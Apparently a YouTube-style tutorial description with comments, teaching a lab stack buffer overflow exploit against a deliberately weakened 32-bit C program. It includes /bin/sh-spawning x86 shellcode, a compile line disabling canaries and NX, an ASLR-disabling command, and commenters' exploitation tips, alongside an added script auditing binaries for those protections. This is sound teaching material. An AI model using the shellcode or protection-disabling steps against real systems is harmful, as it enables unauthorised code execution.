How to exploit a buffer overflow vulnerability - Practical

This tutorial walks through the basic technique for exploiting a buffer overflow vulnerability, using a worked example.

This tutorial assumes that you already have basic C knowledge, gdb and gcc installed, and an understanding of how programs lay out memory.

The source code for the program can be downloaded at

The 46 byte shellcode (x86*) used in this program is "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"

The compile line is: gcc -o example -fno-stack-protector -m32 -z execstack example.c
-fno-stack-protector === Disables the stack canary that would otherwise sit between the buffer and the saved return address, so the overflow goes undetected
-m32 === Compiles the program as a 32-bit binary
-z execstack === Makes the stack executable

NOTE: If this tutorial is not working, it is most likely because you have ASLR enabled. To disable it, run the following command in your terminal:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
When you are finished, I strongly recommend turning it back on with the command:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

* If your computer uses an ARM processor this won't work. If you don't know what that means: as of 2021 it should work as long as you are not on a Raspberry Pi, a phone, or an Apple computer released after 2020.
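As an added, defender-side example that is not part of the video or its source code: a small POSIX shell script that audits a compiled binary for the three protections the compile line above turns off (stack canary, non-executable stack, PIE) and names the current ASLR setting. It assumes binutils' readelf is installed for audit_binary; the readelf excerpts embedded in it are constructed samples, not real output.

```shell
#!/bin/sh
# Added example (not from the video or its source): audit an ELF binary for the
# protections the tutorial's compile line turns off and name the current ASLR setting.
# audit_binary assumes binutils' readelf; the parsers take captured readelf text.

# -z execstack shows up as an "E" flag on GNU_STACK (flags sit before the Align column).
stack_is_executable() {   # $1 = text of `readelf -lW <binary>`
    printf '%s\n' "$1" |
        awk '$1 == "GNU_STACK" && $(NF-1) ~ /E/ { found = 1 } END { exit !found }'
}

# __stack_chk_fail referenced = at least one function has a canary; absent under -fno-stack-protector.
has_stack_canary() {      # $1 = text of `readelf -sW <binary>`
    printf '%s\n' "$1" | grep -q '__stack_chk_fail'
}

# Type DYN means PIE, so ASLR can relocate the code; EXEC always loads at one base.
is_pie() {                # $1 = text of `readelf -hW <binary>`
    printf '%s\n' "$1" | grep -Eq 'Type:[[:space:]]+DYN'
}

# Meaning of the values written to /proc/sys/kernel/randomize_va_space.
aslr_level_name() {       # $1 = 0, 1 or 2
    case "$1" in
        0) echo "disabled" ;;
        1) echo "partial (heap/brk not randomised)" ;;
        2) echo "full" ;;
        *) echo "unknown" ;;
    esac
}

# Run every check on a real file and print one verdict per protection.
audit_binary() {          # $1 = path to an ELF binary
    l=$(readelf -lW "$1") && s=$(readelf -sW "$1") && h=$(readelf -hW "$1") || return 1
    if stack_is_executable "$l"; then echo "WARN: executable stack"; else echo "ok: NX stack"; fi
    if has_stack_canary "$s"; then echo "ok: stack canary"; else echo "WARN: no stack canary"; fi
    if is_pie "$h"; then echo "ok: PIE"; else echo "WARN: non-PIE, fixed load address"; fi
    if [ -r /proc/sys/kernel/randomize_va_space ]; then
        echo "ASLR: $(aslr_level_name "$(cat /proc/sys/kernel/randomize_va_space)")"
    fi
}

# Constructed readelf excerpts (not real output): the tutorial's 32-bit build vs a hardened one.
TUTORIAL_SEGMENTS='  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10'
HARDENED_SEGMENTS='  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10'
HARDENED_SYMBOLS='    12: 00000000     0 FUNC    GLOBAL DEFAULT  UND __stack_chk_fail@GLIBC_2.4 (2)'
stack_is_executable "$TUTORIAL_SEGMENTS" && echo "sample: tutorial build has an executable stack"
if [ $# -eq 1 ]; then audit_binary "$1"; fi
```

Run it as `sh audit.sh ./example` to check a real binary; the sample lines at the bottom show the tutorial build tripping the executable-stack check.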
Comments
Author

To anyone getting:
Cannot insert breakpoint 1.
Cannot access memory at address

The memory addresses displayed when you first run disassemble main are not correct.
To get the correct ones, run the commands as follows:

gdb ./example
run
disassemble main

Now you get the correct ones; copy it and quit gdb.
gdb ./example
break *the address you copied

Now running the command (run $(python will work.

Thanks for the video :)

AtlasMTBRider
Author

TL;DR: Most of you will get something like "Cannot access memory at address 0x...."
That's because you have a 64-bit system installed.
To get this to work, use the $rsp register instead of $esp.

Author

I must say, this is the best video tutorial I have come across explaining how to exploit a buffer overflow. Well done!

RealKalleAnka
Author

Thanks man, I got a reliable shellcode from your description. I was bugging my head over not spawning a new shell with my shellcode. It worked like a charm with your shellcode.

yaseen
Author

Great job at really explaining buffer overflows and how to exploit them.

pberson
Author

Dude! Thank you!!!
I'm studying for the Security+ and I didn't understand the concept of buffer overflow because I couldn't picture it, but thanks to your video I gained a better understanding. The visual aspect is of great help to someone like me who knows nothing about software coding and programming.

Thanks lots mate!!!

Arkata
Author

This tutorial is amazing. Thank you so much for the work you put into it.

Henry_the_knight
Author

Thank you so much man. This video saved me on a homework assignment!

ayanoayumu
Author

You should use GDB to inspect the code and get an idea of the possible attack, but since it inserts extra variables for debugging purposes, you'll have to deal with the offset introduced.

sorrefly
Author

This really helped me understand the details of buffer overflows, thanks!

annablendermann
Author

This might be the best tutorial ever, but I still couldn't understand my security homework.

pennysmith
Author

Thank you so much for this! Practical and easy to understand.

DS-mgzx
Author

Great explanation. Thank you for the details!

Beulzabob
Author

Love this; would have loved a little more explanation on the shellcode though, would have gladly watched for 30 mins.

cursedfox
Author

Great explanation, and concise example. Thanks.

srcmake
Author

Ran the code with the flags you mentioned in the description but still facing the same issue of "cannot access memory at address". I am using Kali Linux 32-bit version in VMware. Disabled ASLR. Any solution would be highly appreciated.

shubhamshah
Author

Don't forget to use python 2 not 3. Otherwise the NOP sled will not be created correctly!

pitkes
Author

You didn't mention one needs to make the stack executable for this, with the -zexecstack option to gcc while compiling. I found that the hard way but thanks for the video, it is very informative.

harbaapkabaap
Author

Excellent explanation, thank you. Can you advise on how you developed the machine code that you ran to get the shell to start?

karimbarakat
Author

Impressive skills.

Thanks for the tutorial!!

Darieee